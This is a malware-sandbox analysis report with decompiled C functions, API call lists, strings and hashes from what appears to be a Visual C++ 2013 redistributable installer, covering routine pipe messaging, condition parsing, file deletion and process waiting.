0x01282fc6
0x01282fc6
0x01282fd6
0x01282fdb
0x01282fe0
0x01282fe1
0x01282fe7
0x01282fe8
0x01282f6d
0x01282f6d
0x01282f72
0x01282f73
0x01282f79
0x01282fec
0x01282ff1
0x01282ff1
0x01282ffb

APIs

WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00000000,?,80070057,F0000002), ref: 01282F98

Strings

Failed to allocate message to write., xrefs: 01282F6D
Failed to write message type to pipe., xrefs: 01282FDB
pipe.cpp, xrefs: 01282FD1

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
API String ID: 3934441357-1996674626
Opcode ID: 2d4e40367cf9112095c3d6ad0a91d4e00327e4c20c20b2aa8640128081cd0534
Instruction ID: 1035b8c9c2125298fae65ead774126ed38ce932792a3dd6d2d5fd4d6158fa9c0
Opcode Fuzzy Hash: 2d4e40367cf9112095c3d6ad0a91d4e00327e4c20c20b2aa8640128081cd0534
Instruction Fuzzy Hash: 0A11D27292120AFFEB11AF989D85DEE7BB9EF64350B200016F901A2181E6759A10D760

Uniqueness

Uniqueness Score: -1.00%

Function 01296CDB Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E01296CDB(intOrPtr* __eax, void* __edx, intOrPtr _a4) {
				void* __esi;
				void* _t11;
				void* _t17;
				void* _t20;
				void* _t24;
				void* _t30;

				_t32 = __eax;
				_t11 =  *((intOrPtr*)(__eax + 0x10)) - 0x10;
				if(_t11 == 0) {
					L8:
					E012A8221(_a4, 0x10, _t32 + 0x18, 0x10);
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					goto L9;
				} else {
					_t17 = _t11 - 1;
					if(_t17 == 0) {
						_t30 = E0128A5CE(_t24, __edx,  *__eax,  *((intOrPtr*)(__eax + 0x18)), _a4);
						__eflags = _t30 - 0x80070490;
						if(__eflags == 0) {
							L9:
							_t30 = E01296520(_t32, __eflags);
							__eflags = _t30;
							if(_t30 < 0) {
								_push("Failed to read next symbol.");
								goto L11;
							}
						} else {
							__eflags = _t30;
							if(__eflags >= 0) {
								goto L9;
							} else {
								E012B294E(_t18, "condition.cpp", 0x1ad, _t30);
								_push("Failed to find variable.");
								L11:
								_push(_t30);
								E012AFA86();
							}
						}
					} else {
						_t20 = _t17 - 1;
						if(_t20 == 0) {
							goto L8;
						} else {
							_t21 = _t20 == 1;
							if(_t20 == 1) {
								goto L8;
							} else {
								_t30 = 0x8007000d;
								 *((intOrPtr*)(__eax + 0x28)) = 1;
								E012B294E(_t21, "condition.cpp", 0x1bc, 0x8007000d);
								_push( *((intOrPtr*)(_t32 + 0x14)));
								E012AFA86(0x8007000d, "Failed to parse condition \'%ls\' at position: %u",  *((intOrPtr*)(_t32 + 4)));
							}
						}
					}
				}
				return _t30;
			}

0x01296cdf
0x01296ce4
0x01296ce8
0x01296d57
0x01296d62
0x01296d6c
0x01296d6d
0x01296d6e
0x01296d6f
0x00000000
0x01296cea
0x01296cea
0x01296ceb
0x01296d32
0x01296d34
0x01296d3a
0x01296d70
0x01296d75
0x01296d77
0x01296d79
0x01296d7b
0x00000000
0x01296d7b
0x01296d3c
0x01296d3c
0x01296d3e
0x00000000
0x01296d40
0x01296d4b
0x01296d50
0x01296d80
0x01296d80
0x01296d81
0x01296d87
0x01296d3e
0x01296ced
0x01296ced
0x01296cee
0x00000000
0x01296cf0
0x01296cf0
0x01296cf1
0x00000000
0x01296cf3
0x01296cf3
0x01296d03
0x01296d0a
0x01296d0f
0x01296d1b
0x01296d20
0x01296cf1
0x01296cee
0x01296ceb
0x01296d8d

APIs

_memcpy_s.LIBCMT ref: 01296D62

Strings

Failed to parse condition '%ls' at position: %u, xrefs: 01296D15
Failed to read next symbol., xrefs: 01296D7B
Failed to find variable., xrefs: 01296D50
condition.cpp, xrefs: 01296CFE, 01296D46

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: 7dd3ae930008ea525c05aa4234058899b2e9a82efcd5b1d37073d384c40cbeb9
Instruction ID: c15d6dc22f4e5bb2e4054a44c660e5d1e8bfb7bc40a98f319bc3347723a45ac1
Opcode Fuzzy Hash: 7dd3ae930008ea525c05aa4234058899b2e9a82efcd5b1d37073d384c40cbeb9
Instruction Fuzzy Hash: C11180722B0B0676FF31266DCC01E7B79E1CB94F50F54062CF354922A0DAA1E48082F6

Uniqueness

Uniqueness Score: -1.00%

Function 01297753 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 012B233B: GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
Part of subcall function 012B233B: RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,20000004,?,01297829,0000001A,?,00000000,00000000,00000000), ref: 0129779F
GetLastError.KERNEL32(?,01297829,0000001A,?,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 012977A9

Strings

Failed to create well known SID., xrefs: 012977D8
cache.cpp, xrefs: 0129777A, 012977CE
Failed to allocate memory for well known SID., xrefs: 01297786

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: a2161b66003f3297337ff43e0d4c305109266439d6b1bea7bd747f2f12df33f2
Instruction ID: cd5a520a22a1c38695062b8082efefd1d30e622fd265705853493fa23024cb7e
Opcode Fuzzy Hash: a2161b66003f3297337ff43e0d4c305109266439d6b1bea7bd747f2f12df33f2
Instruction Fuzzy Hash: C211E932671716B6E73156195D05FAF3A998F81F61F110118FA04FB280EAA8D90146E4

Uniqueness

Uniqueness Score: -1.00%

Function 01282EA6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E01282EA6(char _a4, intOrPtr _a8, char _a12, intOrPtr* _a16, intOrPtr* _a20) {
				char _t30;
				intOrPtr _t33;
				char _t34;
				intOrPtr _t35;

				_t34 = _a12;
				_t30 = 0;
				if(_a8 == 0) {
					_t34 = 0;
					_a12 = 0;
				}
				_t35 = _t34 + 8;
				_t33 = E012B233B(_t35, _t30);
				if(_t33 != _t30) {
					E012A8221(_t33, _t35,  &_a4, 4);
					_t7 = _t33 + 4; // 0x4
					E012A8221(_t7, _t35 - 4,  &_a12, 4);
					if(_a12 != _t30) {
						_t12 = _t33 + 8; // 0x8
						E012A8221(_t12, _t35 - 8, _a8, _a12);
					}
					 *_a20 = _t35;
					 *_a16 = _t33;
				} else {
					_t30 = 0x8007000e;
					E012B294E(_t15, "pipe.cpp", 0x2d7, 0x8007000e);
					_push("Failed to allocate memory for message.");
					_push(0x8007000e);
					E012AFA86();
				}
				return _t30;
			}

0x01282eab
0x01282eae
0x01282eb4
0x01282eb6
0x01282eb8
0x01282eb8
0x01282ebc
0x01282ec5
0x01282ec9
0x01282ef9
0x01282f08
0x01282f0c
0x01282f17
0x01282f23
0x01282f27
0x01282f2c
0x01282f32
0x01282f37
0x01282ecb
0x01282edb
0x01282edd
0x01282ee2
0x01282ee7
0x01282ee8
0x01282eee
0x01282f3f

APIs

_memcpy_s.LIBCMT ref: 01282EF9
_memcpy_s.LIBCMT ref: 01282F0C
_memcpy_s.LIBCMT ref: 01282F27

Part of subcall function 012A8221: _memmove.LIBCMT ref: 012A825D
Part of subcall function 012A8221: _memset.LIBCMT ref: 012A826F

Strings

Failed to allocate memory for message., xrefs: 01282EE2
pipe.cpp, xrefs: 01282ED6

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memcpy_s$_memmove_memset
String ID: Failed to allocate memory for message.$pipe.cpp
API String ID: 3316475362-1914209504
Opcode ID: 636ba88c7feff90f6debf018ba2b0120bf9b8c13420a9a3be1e02bec7b880a99
Instruction ID: f441d1984be763a94589176745304fbedaf744077967fd0ca8bee5c1a2f570a2
Opcode Fuzzy Hash: 636ba88c7feff90f6debf018ba2b0120bf9b8c13420a9a3be1e02bec7b880a99
Instruction Fuzzy Hash: 7D11A3B252121ABBDB11AF95CC80CEB779CEF19750F40052AFA14A7240E7B4AA15C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0128768F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0128768F(intOrPtr* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				_t34 = __esi;
				_v8 = _v8 & 0x00000000;
				asm("stosd");
				asm("stosd");
				if(E01288C14(_a4,  *((intOrPtr*)(__esi + 0x14)),  &_v8, 0) >= 0) {
					_t32 = E012B5C53(_v8,  &_v12,  &_v16);
					if(_t32 == 0x80070002 || _t32 == 0x80070003) {
						_push(_v8);
						E012AF6A2(2, "File search: %ls, did not find path: %ls",  *_t34);
						_t33 = 0;
					} else {
						if(_t32 >= 0) {
							_t33 = E0128A76F(_a4,  *((intOrPtr*)(__esi + 4)), _v16, _v12, 0);
							if(_t33 < 0) {
								_push("Failed to set variable.");
								goto L8;
							}
						} else {
							_push("Failed get file version.");
							goto L8;
						}
					}
				} else {
					_push("Failed to format path string.");
					L8:
					_push(_t33);
					E012AFA86();
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t33;
			}

0x0128768f
0x01287695
0x0128769f
0x012876a2
0x012876b6
0x012876cf
0x012876d7
0x01287714
0x01287720
0x01287728
0x012876e1
0x012876e3
0x012876ff
0x01287703
0x01287705
0x00000000
0x01287705
0x012876e5
0x012876e5
0x00000000
0x012876e5
0x012876e3
0x012876b8
0x012876b8
0x0128770a
0x0128770a
0x0128770b
0x01287711
0x0128772e
0x01287733
0x01287733
0x0128773c

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 012876AD

Strings

Failed get file version., xrefs: 012876E5
Failed to set variable., xrefs: 01287705
Failed to format path string., xrefs: 012876B8
File search: %ls, did not find path: %ls, xrefs: 01287719

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: 922b6bada1ff8d537e3e3eb2808ac2c255a0c195943a6b1eafa0b98591ebaa88
Instruction ID: 97aa5f84d4c080f3912cc9bb69ab9cbadeb7bc97ab70b70f618f2981df4f051a
Opcode Fuzzy Hash: 922b6bada1ff8d537e3e3eb2808ac2c255a0c195943a6b1eafa0b98591ebaa88
Instruction Fuzzy Hash: 201104375B1205FADB07BAA8CD42FEE7676EBA4750F310025E615660A0EA749640E760

Uniqueness

Uniqueness Score: -1.00%

Function 012B5BBE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E012B5BBE(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed char _v8;
				signed int _t14;
				signed int _t20;

				_v8 = _v8 | 0xffffffff;
				_t20 = 0;
				if(E012B5710(_a4,  &_v8) != 0) {
					if((_v8 & 0x00000007) == 0 || SetFileAttributesW(_a4, 0x80) != 0) {
						L7:
						if(DeleteFileW(_a4) == 0) {
							_t14 = GetLastError();
							if(_t14 > 0) {
								_t14 = _t14 & 0x0000ffff | 0x80070000;
							}
							_t20 = _t14;
							if(_t20 < 0) {
								_push(_t20);
								_push(0x51f);
								goto L12;
							}
						}
					} else {
						_t14 = GetLastError();
						if(_t14 > 0) {
							_t14 = _t14 & 0x0000ffff | 0x80070000;
						}
						_t20 = _t14;
						if(_t20 >= 0) {
							goto L7;
						} else {
							_push(_t20);
							_push(0x519);
							L12:
							_push("fileutil.cpp");
							E012B294E(_t14);
						}
					}
				}
				return _t20;
			}

0x012b5bc2
0x012b5bce
0x012b5bd7
0x012b5be9
0x012b5c19
0x012b5c24
0x012b5c26
0x012b5c2e
0x012b5c32
0x012b5c32
0x012b5c34
0x012b5c38
0x012b5c3a
0x012b5c3b
0x00000000
0x012b5c3b
0x012b5c38
0x012b5bfd
0x012b5bfd
0x012b5c05
0x012b5c09
0x012b5c09
0x012b5c0b
0x012b5c0f
0x00000000
0x012b5c11
0x012b5c11
0x012b5c12
0x012b5c40
0x012b5c40
0x012b5c45
0x012b5c45
0x012b5c0f
0x012b5c4b
0x012b5c50

APIs

Part of subcall function 012B5710: _memset.LIBCMT ref: 012B573B
Part of subcall function 012B5710: FindFirstFileW.KERNEL32(00000000,?,00000000,?,80070002), ref: 012B574B
Part of subcall function 012B5710: FindClose.KERNEL32(00000000), ref: 012B5757

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,?,00000000,000000FF,00000000,?,?,012996F7,?,00000000,E0000136,00000000,?,?), ref: 012B5BF3
GetLastError.KERNEL32(?,?,012996F7,?,00000000,E0000136,00000000,?,?,00000000,?,00000000,?,?,00000000,00000000), ref: 012B5BFD
DeleteFileW.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,?,?,012996F7,?,00000000,E0000136,00000000,?,?,00000000), ref: 012B5C1C
GetLastError.KERNEL32(?,?,012996F7,?,00000000,E0000136,00000000,?,?,00000000,?,00000000,?,?,00000000,00000000), ref: 012B5C26

Strings

fileutil.cpp, xrefs: 012B5C40

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst_memset
String ID: fileutil.cpp
API String ID: 1255660700-2967768451
Opcode ID: b5a7d30c0851635db3ed091777575121404eb66eab2420ea1f9ada887a17c461
Instruction ID: b7d03e92eba67f67e2079d9eefdf3e977bb6a05bdcc1b5a3e52bae3ecdd3f1f9
Opcode Fuzzy Hash: b5a7d30c0851635db3ed091777575121404eb66eab2420ea1f9ada887a17c461
Instruction Fuzzy Hash: DC01887133030BABEB221AAEDDC9FEA3A9E9F147D5F080235BB45DA091E6A5C9404750

Uniqueness

Uniqueness Score: -1.00%

Function 0129648F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0129648F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _t20;
				void* _t30;
				void* _t31;

				_t24 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t30 = E012B4EA7(_a8, L"Condition",  &_v12);
				if(_t30 != 1) {
					if(_t30 >= 0) {
						_t31 = E012B4F2F(_v12,  &_v8);
						if(_t31 >= 0) {
							_t31 = E012B1171(_t24, __edx, _a4, _v8, 0);
							if(_t31 < 0) {
								_push("Failed to copy condition string from BSTR");
								goto L8;
							}
						} else {
							_push("Failed to get Condition inner text.");
							goto L8;
						}
					} else {
						_push("Failed to select condition node.");
						L8:
						_push(_t31);
						E012AFA86();
					}
				} else {
					_t31 = 0;
				}
				if(_v8 != 0) {
					__imp__#6(_v8);
				}
				_t20 = _v12;
				if(_t20 != 0) {
					 *((intOrPtr*)( *_t20 + 8))(_t20);
				}
				return _t31;
			}

0x0129648f
0x01296492
0x01296493
0x01296494
0x01296498
0x012964ae
0x012964b3
0x012964bb
0x012964d0
0x012964d4
0x012964ea
0x012964ee
0x012964f0
0x00000000
0x012964f0
0x012964d6
0x012964d6
0x00000000
0x012964d6
0x012964bd
0x012964bd
0x012964f5
0x012964f5
0x012964f6
0x012964fc
0x012964b5
0x012964b5
0x012964b5
0x01296501
0x01296506
0x01296506
0x0129650c
0x01296511
0x01296516
0x01296516
0x0129651d

APIs

SysFreeString.OLEAUT32(00000000), ref: 01296506

Strings

Failed to get Condition inner text., xrefs: 012964D6
Failed to select condition node., xrefs: 012964BD
Condition, xrefs: 012964A1
Failed to copy condition string from BSTR, xrefs: 012964F0

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FreeString
String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
API String ID: 3341692771-3600577998
Opcode ID: d684205c9217c9d0b37778010b4f551dfaf3317277c17e1ec603841e697f5e83
Instruction ID: 33b48c4d4eae22b5d55dfdda756e8fd3a3f6a2a71437ec89543196cc36e8604d
Opcode Fuzzy Hash: d684205c9217c9d0b37778010b4f551dfaf3317277c17e1ec603841e697f5e83
Instruction Fuzzy Hash: 9311E132A70229BBDF22AB98ED45FED7AA9DF10751F104168ED01B7250C774DE008780

Uniqueness

Uniqueness Score: -1.00%

Function 012B0034 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E012B0034(void* __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t10;
				signed int _t15;
				signed int _t22;

				_t22 = 0;
				_v8 = _v8 & 0;
				_t10 = WaitForSingleObject(_a4, _a8);
				_v8 = _t10;
				if(_t10 != 0xffffffff) {
					if(_t10 != 0x102) {
						if(GetExitCodeProcess(_a4,  &_v8) != 0) {
							 *_a12 = _v8;
						} else {
							_t15 = GetLastError();
							if(_t15 > 0) {
								_t15 = _t15 & 0x0000ffff | 0x80070000;
							}
							_t22 = _t15;
							if(_t22 >= 0) {
								_t22 = 0x80004005;
							}
							_push(_t22);
							_push(0x132);
							goto L14;
						}
					} else {
						_t22 = 0x80070102;
					}
				} else {
					_t15 = GetLastError();
					if(_t15 > 0) {
						_t15 = _t15 & 0x0000ffff | 0x80070000;
					}
					_t22 = _t15;
					if(_t22 >= 0) {
						_t22 = 0x80004005;
					}
					_push(_t22);
					_push(0x129);
					L14:
					_push("procutil.cpp");
					E012B294E(_t15);
				}
				return _t22;
			}

0x012b003c
0x012b0041
0x012b0044
0x012b004a
0x012b0050
0x012b007e
0x012b0096
0x012b00cf
0x012b0098
0x012b0098
0x012b00a0
0x012b00a7
0x012b00a7
0x012b00ac
0x012b00b0
0x012b00b2
0x012b00b2
0x012b00b7
0x012b00b8
0x00000000
0x012b00b8
0x012b0080
0x012b0080
0x012b0080
0x012b0052
0x012b0052
0x012b005a
0x012b0061
0x012b0061
0x012b0066
0x012b006a
0x012b006c
0x012b006c
0x012b0071
0x012b0072
0x012b00bd
0x012b00bd
0x012b00c2
0x012b00c2
0x012b00d5

APIs

WaitForSingleObject.KERNEL32(000001F4,?,012A387B,?,?,0129A802,?,000001F4,?,?,?,?,?,?,?,?), ref: 012B0044
GetLastError.KERNEL32(?,?,0129A802,?,000001F4,?,?,?,?,?,?,?,?), ref: 012B0052
GetExitCodeProcess.KERNEL32 ref: 012B008E
GetLastError.KERNEL32(?,?,0129A802,?,000001F4,?,?,?,?,?,?,?,?), ref: 012B0098

Strings

procutil.cpp, xrefs: 012B00BD

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectProcessSingleWait
String ID: procutil.cpp
API String ID: 590199018-1178289305
Opcode ID: 66b999b8a1d8ff0f0535de7762564a33a11405011597f4387eadaf64b044a47d
Instruction ID: 8fee1a9ec787ed6f8744827bc7c56c6125a210c3fbc0c0fe293e0c1040a8d9d7
Opcode Fuzzy Hash: 66b999b8a1d8ff0f0535de7762564a33a11405011597f4387eadaf64b044a47d
Instruction Fuzzy Hash: C5110832A70226EBDB324B54D889AEB7E74DF007E0F114624FD04EB250E679DE0087D9

Uniqueness

Uniqueness Score: -1.00%

Function 012A47B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E012A47B9(intOrPtr* __eax, intOrPtr* __ebx, void* __ecx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t25;
				intOrPtr* _t40;
				void* _t43;

				_t43 = __esi;
				_v8 = _v8 & 0x00000000;
				_t40 = __eax;
				WaitForSingleObject( *(__esi + 0xc), 0xffffffff);
				 *_t40 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x424));
				 *__ebx = 0;
				 *_a4 = 0;
				if( *_t40 != 0) {
					_t25 = E012B233B( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x42c)), 1);
					 *__ebx = _t25;
					if(_t25 != 0) {
						E012A7EC0(_t25,  *((intOrPtr*)(__esi + 0x10)) + 0x430,  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x42c)));
						 *_a4 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x42c));
					} else {
						_v8 = 0x8007000e;
						E012B294E(_t25, "NetFxChainer.cpp", 0xa5, 0x8007000e);
						_push("Failed to allocate memory for message data");
						_push(0x8007000e);
						E012AFA86();
					}
				}
				ReleaseMutex( *(_t43 + 0xc));
				return _v8;
			}

0x012a47b9
0x012a47bd
0x012a47c7
0x012a47c9
0x012a47db
0x012a47df
0x012a47e1
0x012a47e5
0x012a47f2
0x012a47f7
0x012a47fb
0x012a4835
0x012a4849
0x012a47fd
0x012a480d
0x012a4810
0x012a4815
0x012a481a
0x012a481b
0x012a4821
0x012a47fb
0x012a484e
0x012a4859

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,?,?,012A49F0), ref: 012A47C9
ReleaseMutex.KERNEL32(?,?,?,012A49F0), ref: 012A484E

Part of subcall function 012B233B: GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
Part of subcall function 012B233B: RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

_memmove.LIBCMT ref: 012A4835

Strings

NetFxChainer.cpp, xrefs: 012A4808
Failed to allocate memory for message data, xrefs: 012A4815

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait_memmove
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2689949979-1624333943
Opcode ID: bdc05b60b356407919be40e6a94fa488a5fe0ab1114c3ec07dfff102489b9317
Instruction ID: df57e86c4f77af6223af3693caa4202c981a98e28b4163e3500bb0ec93517a47
Opcode Fuzzy Hash: bdc05b60b356407919be40e6a94fa488a5fe0ab1114c3ec07dfff102489b9317
Instruction Fuzzy Hash: E511B8B0220301EFCB20DF24DC88E6ABBF1EB49310F644668EA069B380D771E801CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0128BB5E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0128BB5E(intOrPtr _a4, intOrPtr* _a8) {
				long _t4;
				intOrPtr* _t5;
				long _t9;
				struct _CRITICAL_SECTION* _t12;
				intOrPtr _t13;
				intOrPtr _t15;

				_t13 = _a4;
				_t12 = _t13 + 0x18;
				_t9 = 0;
				EnterCriticalSection(_t12);
				_t4 = InterlockedCompareExchange(_t13 + 0x30, 1, 0);
				_t15 = 0;
				if(_t4 == 0) {
					_t15 = 1;
				} else {
					_t9 = 0x8007139f;
				}
				LeaveCriticalSection(_t12);
				_t5 = _a8;
				if(_t5 != 0) {
					 *_t5 = _t15;
				}
				if(_t9 < 0) {
					E012B294E(_t5, "userexperience.cpp", 0xef, _t9);
					_push("Engine active cannot be changed because it was already in that state.");
					_push(_t9);
					E012AFA86();
				}
				return _t9;
			}

0x0128bb63
0x0128bb67
0x0128bb6b
0x0128bb6d
0x0128bb7a
0x0128bb80
0x0128bb84
0x0128bb8d
0x0128bb86
0x0128bb86
0x0128bb86
0x0128bb8f
0x0128bb95
0x0128bb9a
0x0128bb9c
0x0128bb9c
0x0128bba0
0x0128bbad
0x0128bbb2
0x0128bbb7
0x0128bbb8
0x0128bbbe
0x0128bbc5

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,?,0128D9E6,?,00000000,75BDA770,?,00000000), ref: 0128BB6D
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0128BB7A
